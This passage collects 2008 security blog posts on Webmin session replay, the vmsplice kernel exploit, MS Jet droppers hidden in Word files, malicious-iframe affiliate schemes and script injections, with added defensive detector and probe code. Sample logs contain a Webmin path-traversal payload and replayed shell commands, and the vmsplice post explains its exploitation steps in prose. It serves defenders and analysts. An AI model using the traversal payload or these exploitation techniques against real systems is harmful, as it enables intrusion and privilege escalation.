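  `192.0.2.10 - root [02/Feb/2008:06:20:11 +0800] "POST /proc/run.cgi HTTP/1.1" 200 5120`,
];

// Webmin action-log line: optional [timestamp], user, 32-hex session ID,
// client IP, module, script, then the action details (the first excerpt in
// the post has no timestamp, so that part is optional).
const WEBMIN_RE = /^(?:\[([^\]]+)\]\s+)?(\S+)\s+([0-9a-f]{32})\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$/;

function parseWebminEntry(line) {
  const m = WEBMIN_RE.exec(line);
  if (!m) return null;
  return { ts: m[1] || null, user: m[2], sid: m[3], ip: m[4], module: m[5], script: m[6], detail: m[7] };
}

// Common-log-format access line.
const ACCESS_RE = /^(\S+) (\S+) (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)$/;

function parseAccessEntry(line) {
  const m = ACCESS_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], user: m[3], ts: m[4], method: m[5], path: m[6], status: Number(m[7]) };
}

// 1. Unauthenticated path-traversal reads (the CVE-2006-3392 pattern): a
//    request under /unauthenticated/ whose path contains an encoded or plain "..".
function findTraversalReads(lines) {
  const hits = [];
  for (const line of lines) {
    const e = parseAccessEntry(line);
    if (!e || !e.path.startsWith('/unauthenticated/')) continue;
    if (!/\.\.(?:%[0-9a-f]{2}|\/)/i.test(e.path)) continue;
    hits.push({ ip: e.ip, status: e.status, target: e.path.split('/').pop() });
  }
  return hits;
}

// 2. Commands run through the shell module, the resource the post recommends
//    renaming when Webmin cannot be updated.
function findShellCommands(lines) {
  return lines.map(parseWebminEntry)
    .filter(e => e && e.module === 'shell' && e.script === 'index.cgi')
    .map(e => ({ ip: e.ip, sid: e.sid, detail: e.detail }));
}

// 3. One session ID used from more than one client address: the signature of
//    a disclosed session being replayed by someone other than its owner.
function findSharedSessions(lines) {
  const bySid = new Map();
  for (const line of lines) {
    const e = parseWebminEntry(line);
    if (!e) continue;
    if (!bySid.has(e.sid)) bySid.set(e.sid, new Set());
    bySid.get(e.sid).add(e.ip);
  }
  return [...bySid].filter(([, ips]) => ips.size > 1)
    .map(([sid, ips]) => ({ sid, ips: [...ips].sort() }));
}

function triage(accessLines, webminLines) {
  return {
    traversalReads: findTraversalReads(accessLines),
    shellCommands: findShellCommands(webminLines),
    sharedSessions: findSharedSessions(webminLines),
  };
}
```

On the constructed input the script reports two traversal reads of webmin.log and sessiondb.pag, two shell-module commands, and one session ID seen from both 192.0.2.10 and 203.0.113.9; the last check is the one that survives even when the disclosure vector differs from the one in this post, because a replayed session shows up as one ID from two clients regardless of how it was obtained.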

If you still run a vulnerable Webmin, update it immediately, or at least rename or remove the /shell/index.cgi script so that a replayed session cannot be used to execute arbitrary commands. This attack has been automated and is already being actively used in the wild.
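As an added example (not part of the original post, and not Webmin’s own code), here is a small C detector that encodes the two artifacts above: access-log requests that use the CVE-2006-3392 “..%01/” traversal through /unauthenticated/ to read webmin.log or sessiondb.pag, and a session ID in webmin.log that is used from more than one source IP, which is what a replayed session looks like. The log lines are constructed in the formats the post shows; the plain “../” form and the /etc/webmin/ path are this example’s additions.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Constructed sample lines in the two formats shown in the post (not real logs). */
static const char *const sample_access_log[] = {
    "1.1.1.1 - - [02/Feb/2008:06:31:34 +0800] \"GET /unauthenticated/..%01/..%01/..%01/var/webmin/webmin.log HTTP/1.0\" 200 390944",
    "10.0.0.5 - root [02/Feb/2008:06:20:01 +0800] \"GET /proc/index.cgi HTTP/1.1\" 200 4120",
    "1.1.1.1 - root [02/Feb/2008:06:31:46 +0800] \"POST /shell/index.cgi HTTP/1.1\" 200 4921",
};
static const char *const sample_webmin_log[] = {
    "[04/02/2008 15:26:59] root f3fe4b90803a41096af8880e2e948a24 10.0.0.5 proc run.cgi \"run\" \"-\" \"-\" cmd='ifconfig -a' input='' mode='0'",
    "[04/02/2008 15:27:10] root f3fe4b90803a41096af8880e2e948a24 10.0.0.5 proc index.cgi \"list\" \"-\" \"-\"",
    "[04/02/2008 15:31:46] root f3fe4b90803a41096af8880e2e948a24 1.1.1.1 shell index.cgi \"run\" \"-\" \"-\" cmd='id' input='' mode='0'",
};
#define N_ACCESS 3
#define N_WEBMIN 3

/* 1. An access-log line is a CVE-2006-3392 read if it goes through the
 * unauthenticated handler with a traversal sequence and names a file holding
 * credentials or session state. "..%01/" is the encoding the post shows; the
 * plain "../" form and the /etc/webmin/ path are added here. */
int webmin_traversal_hit(const char *line)
{
    if (strstr(line, "/unauthenticated/") == NULL)
        return 0;
    if (strstr(line, "..%01/") == NULL && strstr(line, "../") == NULL)
        return 0;
    return strstr(line, "webmin.log") != NULL ||
           strstr(line, "sessiondb") != NULL ||
           strstr(line, "/etc/webmin/") != NULL;
}

/* A Webmin session ID is 32 hex characters. */
int webmin_sid_valid(const char *sid)
{
    if (strlen(sid) != 32)
        return 0;
    for (; *sid; sid++)
        if (!isxdigit((unsigned char)*sid))
            return 0;
    return 1;
}

/* 2. Parse "[date time] user sid ip ..." from webmin.log. Each output buffer
 * must hold at least 64 bytes. Returns 1 on a well-formed entry. */
int webmin_parse_session(const char *line, char *user, char *sid, char *ip)
{
    const char *p = strchr(line, ']');
    if (p == NULL)
        return 0;
    if (sscanf(p + 1, " %63s %63s %63s", user, sid, ip) != 3)
        return 0;
    return webmin_sid_valid(sid);
}

#define MAX_SESS 64
struct sess_seen { char sid[33]; char ip[64]; int replayed; };

/* Count session IDs that appear from more than one source IP: a session that
 * was issued to one host and later replayed from another. Each ID counts once. */
int webmin_replayed_sessions(const char *const *lines, int n)
{
    struct sess_seen tab[MAX_SESS];
    int count = 0, replayed = 0;
    for (int i = 0; i < n; i++) {
        char user[64], sid[64], ip[64];
        if (!webmin_parse_session(lines[i], user, sid, ip))
            continue;
        int j;
        for (j = 0; j < count; j++)
            if (strcmp(tab[j].sid, sid) == 0)
                break;
        if (j == count) {
            if (count == MAX_SESS)
                continue;                 /* table full: ignore further IDs */
            memcpy(tab[count].sid, sid, 33);
            memcpy(tab[count].ip, ip, 64);
            tab[count].replayed = 0;
            count++;
        } else if (!tab[j].replayed && strcmp(tab[j].ip, ip) != 0) {
            tab[j].replayed = 1;          /* same ID, second source IP */
            replayed++;
        }
    }
    return replayed;
}

int main(void)
{
    for (int i = 0; i < N_ACCESS; i++)
        if (webmin_traversal_hit(sample_access_log[i]))
            printf("traversal read: %s\n", sample_access_log[i]);
    printf("replayed sessions: %d\n",
           webmin_replayed_sessions(sample_webmin_log, N_WEBMIN));
    return 0;
}
```

Run against real logs, the two checks complement each other: the first shows the file disclosure, the second shows what the attacker did with it, and a session ID seen from two source addresses is worth investigating even when no traversal was logged.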

Again with the spoofing…

A vulnerability has popped up (no pun intended… really) in Internet Explorer (IE), or at least one is claimed by a researcher named Juan Pablo Lopez Yacubian on the popular Bugtraq mailing list. It allows a page to spoof the address shown in a popup window without affecting the underlying page. A bad guy could therefore send the victim a legitimate-looking link, have them follow it, and open a spoofed popup once they land on the attacker-controlled (or hacked legitimate) site. If the popup is enticing enough, the attacker could persuade the victim to disclose information, click malicious links, or do other nefarious things.

There are a good number of fairly obvious caveats to successful exploitation, however. First, the victim must allow scripts to run; otherwise IE blocks it. Second, even with scripting allowed, a decent popup blocker should stop the window from appearing at all. Next, any click within the body of the popup reveals the true address. Lastly, to remain aesthetically convincing, the spoofed address is limited to a certain character length.

All in all, this is nothing really spectacular…

That said, the main point here is to remind you to be sure to have basic browser protection (script blocking, trusted-domain model, popup blockers, etc.) in place and use common sense when you receive unsolicited links and unexpected popups.

Safe surfing…

RussianCash

Last week, I read some interesting news on the Australian website The Age. A journalist explained that a Russian malware distribution site offered a haul of 1000 spyware-infected Australian machines for US$100, double the price offered for US machines and 30 times the price for machines from Asia.

Searching this site, I discovered the InstallsCash partnership program:

It was a well-known dishonest offer: after registration, the affiliate had to place a short, one-line iframe snippet on his website pages. As the FAQ explained, this hidden iframe silently redirected every visitor to another website, where the affiliate program’s software was installed through an MPack-like exploit process. Each successful installation originating from the affiliate’s site earned a payment.

To cover their tracks, the InstallsCash domain was registered through a Chinese registrar (bizcn.com). The fake registrant address is in the US (Iowa City) and the contact e-mail is in Russia (ydwrtyxamz_at_mail.ru). It is easy to see that this last one was chosen at random. We will surely encounter others like it in our investigations!

Being curious, and to clearly demonstrate the dishonesty of the offer, I subscribed myself, using fake data to fill in the form:

This screenshot is interesting: it lists the accepted payment systems, and we recognize all the usual ones cybercriminals use. Having done that, I had to wait 24 hours:

On Saturday morning I tried my luck and attempted a connection. They had activated my registration and my personal iframe code was waiting for me:

As I mentioned above, the iframe I had to hide on my website pointed to another website with a strange, randomly generated name of the kind produced by the more or less automated method I discussed in a previous blog entry. It seems the affiliator creates or uses a different one for each affiliate. Thanks to these unique names, the software recognizes each affiliate; data can be fed into their stats page and payments calculated from it.

On my personal page, the top white window contained my iframe. In the middle the affiliator gave me the same one, but in an encoded (obfuscated) form. It was not explained, but it was clear I was meant to use this version on my pages to mislead or evade security technologies. The distributor goes so far as to say, and I quote, “they will be updating every 3 days and they will be invisible for every antivirus!”

The whois gave me the result I expected, something similar to InstallsCash.com:

The registrar was bizcn.com, and the registrant contact came with another improbable e-mail address:
Jan Dendinger ycsmmiqtyo_at_mail.ru
Phone +1 3196433xxx Fax: +13.196433xxx
309 East Main Street
West Branch IA 523581
us

Some quick searches with Google allowed me to find many other similar sites.

I looked at my stats page. Of course it was blank:

Where The Age reported $100 per 1000 unique loads, my rate table quoted half that, and only $3 for Asia:

But the journalist was right: in my private message window, as well as on the main page, I could read that InstallsCash had been running a special offer since February 16th, increasing their rates “for USA by 2 and any mix of country was about 30$”:

However, I note the price is still low compared with the payments these guys offered in September 2006, when Australian and UK PCs were the most wanted:

Yes, it seems the same people are hidden behind InstallsCash, IframeCash (September 2006) and IframeDollars (November 2007). To see this you can, for example, compare the FAQs:

In November 2007, the RBNExploit blog discussed the possibility that iFrameCash and iFrameDollars were linked to the Russian Business Network. This confirms that RBN trading partners are still in business. And if they have been offering commissions for deliberately planting malicious iframes for several years, believe me, it is because it is a lucrative business.

Finally, please note that McAfee VirusScan, via its ScriptScan module, detects and blocks the PHP script as JS/Exploit-BO.gen. Moreover, the “invisible” files :-) are detected as Downloader-BDH.

More analysis on the MS Jet Exploits camouflaging as Microsoft Word files

Recently, we blogged about MS Access exploits being delivered through Microsoft Word. In this post we dig deeper, look at the structure of the files used in this attack, and analyze how the payload is delivered.

In the following example, the threat arrived as two files with “.doc” extensions (xxx1.doc and xxx2.doc); however, one of the files is actually a Microsoft Access database containing the MS Jet exploit. The whole story is depicted in Figure 1.


Figure 1: The flow of the trojan installation process

When the user opens the MS Word file xxx1.doc, the MS Access file xxx2.doc is loaded through the document’s data link properties. The shellcode in xxx2.doc then runs (triggered by the MS Jet exploit in the same file) and decodes itself in typical fashion. The shellcode launches WinWord.exe to open the innocent Word file embedded in xxx1.doc.

While the shellcode opens the Word file, it also decodes the executable embedded in xxx1.doc. The decoding is a simple XOR with a mask of 0xFF, plus a separate XOR with 0xAF to deobfuscate the first 8 bytes of the MZ header, which are masked differently from the rest of the image.

You can see the data link aspect of xxx1.doc by placing xxx2.doc in a different folder from xxx1.doc. When xxx1.doc is opened, the “Data Link Properties” window appears. The specified database name is the path containing xxx2.doc and the password is empty. Because of this data link, xxx2.doc is normally loaded silently.
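Added example (not the malware’s code and not McAfee’s tooling): a carver that undoes the masking described above. It assumes the scheme as read from that paragraph, the embedded executable XORed with 0xFF except for its first 8 bytes, which are XORed with 0xAF, and accepts a candidate offset only if the MZ signature, the e_lfanew field and the PE signature all check out after unmasking, so a stray pair of bytes is not enough for a hit. The sample document buffer is constructed inline.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define HDR_MASK_LEN 8       /* first 8 bytes of the MZ header ...      */
#define HDR_MASK     0xAF    /* ... are masked with 0xAF (assumed)      */
#define BODY_MASK    0xFF    /* everything else is masked with 0xFF     */

/* Undo (or apply: XOR is symmetric) the two-mask encoding in place. */
void jet_dropper_decode(uint8_t *buf, size_t n)
{
    for (size_t i = 0; i < n; i++)
        buf[i] ^= (i < HDR_MASK_LEN) ? HDR_MASK : BODY_MASK;
}

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Scan a document buffer for a PE masked with the scheme above. A hit needs
 * "MZ" under the header mask (0xE2 0xF5 on the wire), a sane e_lfanew at
 * offset 0x3c under the body mask, and "PE\0\0" at that offset.
 * Returns the offset of the masked image, or -1. */
long jet_dropper_find_pe(const uint8_t *doc, size_t n)
{
    for (size_t off = 0; off + 0x40 <= n; off++) {
        if ((doc[off] ^ HDR_MASK) != 'M' || (doc[off + 1] ^ HDR_MASK) != 'Z')
            continue;
        uint8_t lf[4];
        for (int k = 0; k < 4; k++)
            lf[k] = doc[off + 0x3c + k] ^ BODY_MASK;
        uint32_t e_lfanew = le32(lf);
        if (e_lfanew < 0x40 || e_lfanew > n - off - 4)   /* PE sig must fit */
            continue;
        const uint8_t *pe = doc + off + e_lfanew;
        if ((pe[0] ^ BODY_MASK) == 'P' && (pe[1] ^ BODY_MASK) == 'E' &&
            (pe[2] ^ BODY_MASK) == 0 && (pe[3] ^ BODY_MASK) == 0)
            return (long)off;
    }
    return -1;
}

/* Constructed sample: a minimal 0x44-byte PE header stub (MZ, e_lfanew=0x40,
 * PE\0\0), masked with the scheme and placed after 16 bytes of filler that
 * stand in for the surrounding .doc container. Returns bytes written. */
#define FILL_LEN 16
#define STUB_LEN 0x44
size_t jet_dropper_build_sample(uint8_t *out, size_t cap)
{
    if (cap < FILL_LEN + STUB_LEN)
        return 0;
    memset(out, 0x11, FILL_LEN);
    uint8_t stub[STUB_LEN];
    memset(stub, 0, sizeof stub);
    stub[0] = 'M'; stub[1] = 'Z';
    stub[0x3c] = 0x40;                   /* e_lfanew, little endian */
    stub[0x40] = 'P'; stub[0x41] = 'E';
    jet_dropper_decode(stub, STUB_LEN);  /* mask it */
    memcpy(out + FILL_LEN, stub, STUB_LEN);
    return FILL_LEN + STUB_LEN;
}

/* Build the sample, carve it, decode in place and return the offset found
 * (-1 if nothing is found, -2 if the decoded bytes do not read back as MZ/PE). */
long jet_dropper_selftest(void)
{
    uint8_t doc[FILL_LEN + STUB_LEN];
    size_t n = jet_dropper_build_sample(doc, sizeof doc);
    long off = jet_dropper_find_pe(doc, n);
    if (off < 0)
        return -1;
    jet_dropper_decode(doc + off, n - (size_t)off);
    if (doc[off] != 'M' || doc[off + 1] != 'Z' || doc[off + 0x40] != 'P')
        return -2;
    return off;
}

int main(void)
{
    printf("masked PE found at offset %ld\n", jet_dropper_selftest());
    return 0;
}
```

On a real sample you would read xxx1.doc into the buffer, call jet_dropper_find_pe(), and write the decoded tail out as the dropped executable; the e_lfanew check is what keeps the scan from firing on random bytes that happen to unmask to “MZ”.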

The trojan installation techniques in this threat are nothing special and can be seen in other exploit files; what is new is the method used to trick users, using a non-exploit OLE file as the loader of another OLE file that carries the exploit. As past attacks have shown, we can no longer rely on file extensions. We should remain careful with all unknown OLE files and not open untrusted email attachments.

Microsoft Jet Database Engine Attacked Through Word

A few weeks ago we blogged that the recent MS Access exploits were nothing new. Well, now there is something new.

On the heels of Symantec blogging about a new tandem Word document/Access database exploit, Microsoft released Security Advisory (950627). As we stated before, Microsoft considers MDB files to be unsafe. Accordingly, Microsoft email clients prevent users from double-clicking MDB (Microsoft Access Database) attachments. Until recently attackers typically exploited MS Jet DB vulnerabilities through MDB files, so Microsoft stuck to its “MDB files are unsafe” position. Well, that has changed.

In several recent, yet limited, attacks, exploits were crafted to attack an MS Jet Database vulnerability through Word. The Word documents reference Access database files regardless of extension, which allows attackers to circumvent content filters looking for specific email attachment extensions.

An attack scenario looks like this:

  1. A user receives an email message with 2 attachments (one of which is a Word document)
  2. The email client saves the attachments to the same directory
  3. The user opens the Word document, which in turn opens the Access database containing the exploit code

In another scenario the attackers have archived both the database and Word document in a ZIP file, but the principle is the same.

Microsoft states that Msjet40.dll versions greater than 4.0.9505.0 are not vulnerable, which means this issue was (silently) fixed in Windows Server 2003 SP2 and Windows Vista.

McAfee DAT files version 5256 (released March 20) detect all known Access exploits as Exploit-MSJet.

Reported Zero-Day in CA Software

Here’s a quick post about a claimed zero-day vulnerability in CA BrightStor ARCserve Backup, software that provides backup functionality for Windows systems. Proof-of-concept exploit code for this vulnerability is public.

A specially crafted Web page could trigger a stack overflow in the AddColumn() method of the ListCtrl ActiveX control. For an attack to occur, a user would have to be tricked into visiting a malicious Web site. The exploit writer states that he has successfully run his attack code against CA BrightStor ARCserve Backup r11.5 with Internet Explorer 6 on Microsoft Windows XP SP2 (Polish edition).

McAfee Avert Labs is analyzing the flaw. As an aside, our research database reveals that the last known vulnerability in CA BrightStor ARCserve Backup was disclosed on November 26, 2007: CVE-2007-5328. CA worked with the discloser to release a patch for the vulnerability on the same day.

Another Mass Attack Underway

On the heels of recent iframe attacks, we are currently tracking another mass compromise. This attack injects script into valid web pages to include a reference to a malicious .JS file (sometimes in the BODY, other times in the TITLE section). The .JS file writes an IFRAME, which loads an HTML file that attempts to exploit several vulnerabilities, including:

  • MS06-014
  • RealPlayer (ActiveX Control)
  • Baofeng Storm (ActiveX Control)
  • Xunlei Thunder DapPlayer (ActiveX Control)
  • Ourgame GLWorld GlobalLink Chat (ActiveX Control)

This is one of those cascading threats, where one page leads to another and another, which leads to an executable, which leads to another and another. At least one of the payload trojans targets online gamers.

Preliminary research results suggest more than 10,000 pages were affected by this hack attack.

Similar attacks have been observed in the past; most notably, the infamous “Dolphin Stadium” (aka Super Bowl) attack, which was later connected with SQL injection as the method the attackers used to inject their malicious code. In cases where the TITLE tag has been modified, the browser’s title bar shows the script reference:


Example of browser title bar (censored)

McAfee’s designations for the various pieces of malware include:

  • Downloader-BGX
  • Exploit-RealPlay
  • JS/Exploit-BO.gen
  • VBS/Psyme

Analysis is ongoing.

Microsoft Access Exploits Nothing New

Recently our friends at PandaLabs published a weblog post stating that a new Microsoft Access exploit had been found in the wild. We researched this exploit and found that it actually targets an older, well-known vulnerability, CVE-2005-0944, found by the HexView team in March 2005. The vulnerability is very easy to exploit. We observed similar exploits last year, and the dropper used in this case looks very similar to that one.

Microsoft considers MDB files to be unsafe, so no specific patch for this vulnerability has been released in the three years since it was made public.

The interesting thing about this vulnerability is that it lies in msjet40.dll, which has not been updated on Windows XP SP2 since the release of MS04-014 (for other platforms, see http://support.microsoft.com/kb/239114).

In this specific case, the dropper uses a jump address in mswstr10.dll, which is part of the MS Jet 4.0 engine package, so on XP SP2 the trojan executes in almost every case, regardless of which version of Office XP or 2003 is installed. We tested Office 2007, 2003 and XP and found that only Office 2007 was immune.

McAfee AV detects this recent exploit with DAT 5236, released February 22, and our IntruShield NIPS sensors detect and block it with the generic MS Access protection signature “HTTP: Microsoft Jet DB Engine Buffer Overflow”, released on November 13, 2007.

Since Microsoft does not patch Access-related vulnerabilities, we highly recommend that Office users never open untrusted MDB files.

The Release of Sage 3 – The Globalization of Malware

Today at Avert Labs, we released the third edition of Sage – our security journal. As always, we strive to be a bit different with our content in Sage. A little provocative, new trends, new ideas… And this issue is no different.

In this issue we look at the growing trend of localization in malware and threats. Cybercriminals are increasingly crafting attacks in multiple languages and are exploiting popular local applications to maximize their profits. Cybercrooks have become extremely deft at learning the nuances of the local regions and creating malware specific to each country. They’re not just skilled at computer programming—they’re skilled at psychology and linguistics, too.

We examined global malware trends in this report, titled “One Internet, Many Worlds.” The report is based on data compiled by our international security experts and examines the globalization of threats and the unique threats in different countries and regions. In the report, we detail the following trends and conclusions:

• Sophisticated malware authors have increased country-, language-, company-, and software-specific attacks
• Cyberattackers are increasingly attuned to cultural differences and tailor social engineering attacks accordingly
• Cybercrime rings recruit malware writers in countries with high unemployment and high levels of education such as Russia and China
• Cybercriminals take advantage of countries where law enforcement is lax
• Around the world, malware authors are exploiting the viral nature of Web 2.0 and peer-to-peer networks
• More exploits than ever before are targeted at locally popular software and applications

Download Sage 3

Analyzing the Linux Kernel vmsplice Exploit

Zero-day emerges

On February 9, zero-day exploit code [1] was posted on the milw0rm site. It exploited a vulnerability in Linux kernel versions 2.6.17 to 2.6.24.1. This bug allows an unprivileged local user to gain root privileges. The vulnerability was assigned CVE-2008-0600. There are reports that this exploit is reliable and actively used in the wild. The inner workings of this exploit are quite interesting from a technical point of view; let’s have a look.

Details on the vulnerability and methods of exploitation

The vulnerability lies in the get_iovec_page_array function (in fs/splice.c; line numbers are from the 2.6.23.1-42.fc8 kernel), reachable from the vmsplice() system call:

1286:       if (unlikely(!len)) /* "len" is under the user's control */
1287:               break;
...
1296:       off = (unsigned long) base & ~PAGE_MASK;
...
1306:       npages = (off + len + PAGE_SIZE - 1) >> PAGE_SHIFT;
1307:       if (npages > PIPE_BUFFERS - buffers)
1308:               npages = PIPE_BUFFERS - buffers;
1309:
1310:       error = get_user_pages(current, current->mm,
1311:                              (unsigned long) base, npages, 0, 0,
1312:                              &pages[buffers], NULL);

The get_user_pages function expects its fourth argument (the number of page descriptors to fill, which also bounds the return value) to be at least 1. The preceding code assumes that npages is at least 1: len must be nonzero, so off + len + PAGE_SIZE - 1 should be greater than or equal to PAGE_SIZE. However, if len is close to UINT32_MAX, the off + len + PAGE_SIZE - 1 computation wraps around, and npages can be zero.

As a result, get_user_pages may return more than PIPE_BUFFERS entries, and the pages array overflows. However, the attacker does not control what is written past the end of the array, so it would be difficult to turn this overflow alone into reliable code execution.
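Added example (not kernel code): a 32-bit model of the npages computation quoted above, next to the range check this example uses to reject the wrap. The constants (PAGE_SIZE 4096, PIPE_BUFFERS 16, a 3G/1G user/kernel split) assume i386, and the arithmetic is forced to 32 bits so it wraps the same way on a 64-bit host. model_page_walk() is a simplified stand-in for the do/while in get_user_pages(), not its code, and the check in vmsplice_npages_checked() is this example’s own rather than a transcript of the upstream fix.

```c
#include <stdint.h>
#include <stdio.h>

#define PAGE_SHIFT   12
#define PAGE_SIZE32  ((uint32_t)1 << PAGE_SHIFT)
#define PAGE_MASK32  (~(PAGE_SIZE32 - 1))
#define PIPE_BUFFERS 16
#define TASK_SIZE32  0xC0000000u   /* top of user space, 3G/1G i386 split */

/* The vulnerable computation, as in get_iovec_page_array() but in 32-bit
 * unsigned arithmetic: the sum wraps for a len near UINT32_MAX and npages
 * comes out as 0 even though len is nonzero. */
uint32_t vmsplice_npages(uint32_t base, uint32_t len, int buffers)
{
    uint32_t off = base & ~PAGE_MASK32;
    uint32_t npages = (off + len + PAGE_SIZE32 - 1) >> PAGE_SHIFT;
    if (npages > (uint32_t)(PIPE_BUFFERS - buffers))
        npages = (uint32_t)(PIPE_BUFFERS - buffers);
    return npages;
}

/* Simplified model of why npages == 0 is not harmless: the walk that fills
 * the page array is a do/while on a decrementing count, so a count of 0
 * passes the first iteration, goes negative, and keeps filling until
 * something else stops it (here hard_stop, standing in for the end of the
 * caller's mapped memory). The real walk is get_user_pages(); this is a
 * model of its loop shape, not its code. */
int model_page_walk(int npages, int hard_stop)
{
    int filled = 0;
    do {
        filled++;
        npages--;
    } while (npages != 0 && filled < hard_stop);
    return filled;
}

/* This example's own range check (not the upstream patch): reject an empty
 * range, a range that wraps around the address space, and a range that
 * reaches into kernel space. Returns npages, or -1 when the range is refused. */
long vmsplice_npages_checked(uint32_t base, uint32_t len, int buffers)
{
    if (len == 0)
        return -1;
    if (base + len < base)           /* wrapped past 0xFFFFFFFF */
        return -1;
    if (base + len > TASK_SIZE32)    /* not entirely in user space */
        return -1;
    return (long)vmsplice_npages(base, len, buffers);
}

int main(void)
{
    uint32_t base = 0x08048000u;
    printf("len=0x1000     npages=%u\n", vmsplice_npages(base, 0x1000u, 0));
    printf("len=0xFFFFFFF0 npages=%u (wrapped)\n", vmsplice_npages(base, 0xFFFFFFF0u, 0));
    printf("walk with npages=0 fills %d pages\n", model_page_walk(0, 64));
    printf("checked len=0xFFFFFFF0: %ld\n", vmsplice_npages_checked(base, 0xFFFFFFF0u, 0));
    return 0;
}
```

The point of the model is the ordering: the clamp on line 1307 only bounds npages from above, so a value that wrapped to 0 sails through, and a count of 0 handed to a do/while page walk means “until the mapping ends”, not “nothing”.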

Reliable exploitation is possible thanks to the subsequent loop:

1320:       for (i = 0; i < error; i++) {
1321:               const int plen = min_t(size_t, len, PAGE_SIZE - off);
1322:
1323:               partial[buffers].offset = off;
1324:               partial[buffers].len = plen;
1325:
1326:               off = 0;
1327:               len -= plen;
1328:               buffers++;
1329:       }

Here, the partial array, which is also PIPE_BUFFERS elements long, is overflowed with (off=0, plen=0x1000) pairs. Now, depending on the variable layout chosen by the compiler, various data structures that follow the partial array can be overwritten with zeros. In the most common case, the pages array is located right after the partial array. The pages array contains pointers, so after the preceding loop it contains NULL pointers.

Normally, when the kernel dereferences a NULL pointer, the result is an exception and the process is terminated. However, the attacker can map a memory page at address zero and store arbitrary data there. In that scenario, when the kernel dereferences the pointers in the pages array, attacker-controlled data is processed, which may result in arbitrary code execution in kernel context. In this case, the convenient technique is to make an entry in the pages array look like a compound page descriptor, which results in a function call to an attacker-controlled address in user space:

37 static void put_compound_page(struct page *page) /* attacker controls arg */
38 {
39     page = (struct page *)page_private(page);
40     if (put_page_testzero(page)) {
41             void (*dtor)(struct page *page);
42
43             dtor = (void (*)(struct page *))page[1].lru.next;
44             (*dtor)(page); /* so the attacker controls the target of the call */
45     }
46 }

To sum up, the exploitation involves:

  • integer overflow
  • buffer overflow
  • mapping the zero address to allow NULL dereference

Workarounds

A kernel upgrade is the preferred solution, but if that is not feasible there are workarounds.

A simple kernel module that disables the sys_vmsplice system call has been posted [2].

The exploit we have discussed relies heavily on being able to map memory at address zero. Starting with kernel 2.6.23, there is a mechanism to forbid such mappings via procfs. The command echo 65536 > /proc/sys/vm/mmap_min_addr sets the lowest possible mapping address to 64K. Note that:

  • SELinux must be enabled (in enforcing mode) for this command to take effect.
  • Although this setting certainly makes the current exploit fail, there is a nonzero probability that the vulnerability can be exploited without mapping the zero address. I know of no code capable of such exploitation; however, it cannot be ruled out.
  • This setting may also prevent exploitation of future NULL pointer dereference vulnerabilities. Very few programs make legitimate use of mapping the zero address.
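Added example (not from the post): a probe a sysadmin can compile and run to confirm that the mmap_min_addr workaround actually bites on a given box, rather than trusting the sysctl value alone. It reads the sysctl from procfs and then attempts exactly what the exploit needs, a MAP_FIXED mapping at address 0. Linux is assumed; on a kernel older than 2.6.23 the sysctl file is missing and only the probe result counts, and a kernel where the sysctl is set but not enforced (the SELinux caveat above) shows up as a mapping that succeeds.

```c
#define _DEFAULT_SOURCE 1
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>

#ifndef MAP_ANONYMOUS
# ifdef MAP_ANON
#  define MAP_ANONYMOUS MAP_ANON
# else
#  define MAP_ANONYMOUS 0x20      /* Linux value, for strict-C header sets */
# endif
#endif

/* Value of /proc/sys/vm/mmap_min_addr, or -1 when the file is absent
 * (pre-2.6.23 kernel, or not Linux at all). */
long read_mmap_min_addr(void)
{
    FILE *f = fopen("/proc/sys/vm/mmap_min_addr", "r");
    if (f == NULL)
        return -1;
    long v = -1;
    if (fscanf(f, "%ld", &v) != 1)
        v = -1;
    fclose(f);
    return v;
}

/* The exploit's precondition: can this process map a page at address 0?
 * Returns 1 if the mapping succeeds (it is unmapped again), 0 if the kernel
 * refuses; *err receives errno on refusal (EPERM when mmap_min_addr bites). */
int zero_page_mappable(int *err)
{
    long pg = sysconf(_SC_PAGESIZE);
    size_t len = pg > 0 ? (size_t)pg : 4096;
    void *p = mmap((void *)0, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    if (p == MAP_FAILED) {
        if (err)
            *err = errno;
        return 0;
    }
    munmap(p, len);
    if (err)
        *err = 0;
    return 1;
}

/* 1 when the workaround is demonstrably in force for this process: the
 * sysctl is set and the probe is refused. */
int mmap_min_addr_effective(void)
{
    return read_mmap_min_addr() > 0 && !zero_page_mappable(NULL);
}

/* Self-check relating sysctl and probe: an unprivileged process should be
 * able to map page zero only if the sysctl is unset or absent. Root (which
 * may hold CAP_SYS_RAWIO) is allowed through, hence the euid test. */
int mmap_min_addr_consistent(void)
{
    long min = read_mmap_min_addr();
    int mappable = zero_page_mappable(NULL);
    return min <= 0 || !mappable || geteuid() == 0;
}

int main(void)
{
    int err = 0;
    long min = read_mmap_min_addr();
    int ok = zero_page_mappable(&err);
    printf("vm.mmap_min_addr = %ld\n", min);
    printf("mmap at address 0: %s\n",
           ok ? "ALLOWED (exploit precondition holds)" : "refused");
    if (!ok)
        printf("errno = %d (%s)\n", err, strerror(err));
    return ok ? 1 : 0;
}
```

Run it as the unprivileged user you are worried about, not as root: the process exit status is 1 when page zero could be mapped, which makes it easy to wire into a configuration check.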

References

[1] Linux vmsplice Local Root Exploit, by qaaz

[2] Runtime disable of sys_vmsplice

Another Adobe PDF Exploit in the Wild

McAfee Avert Labs is tracking active in-the-wild exploitation of a recently patched vulnerability in Adobe Reader and Acrobat. The exploit is embedded in a PDF file and driven through Adobe JavaScript.

The first evidence of such maliciously crafted PDF files was posted to an Italian message forum by an alert administrator who noted that three of his workstations had been infected. Successful exploitation leads to the embedded JavaScript being executed on the victim’s machine; the script attempts to download a Trojan from an IP address in the Netherlands.

This exploit works for both browser-based and email attack vectors and affects the following Adobe products:

  • Adobe Reader 8.1.1 and earlier versions
  • Adobe Acrobat Professional, 3D, and Standard 8.1.1 and earlier versions

Complete mitigation requires upgrading Acrobat and Adobe Reader 7.x and 8.x to Version 8.1.2.

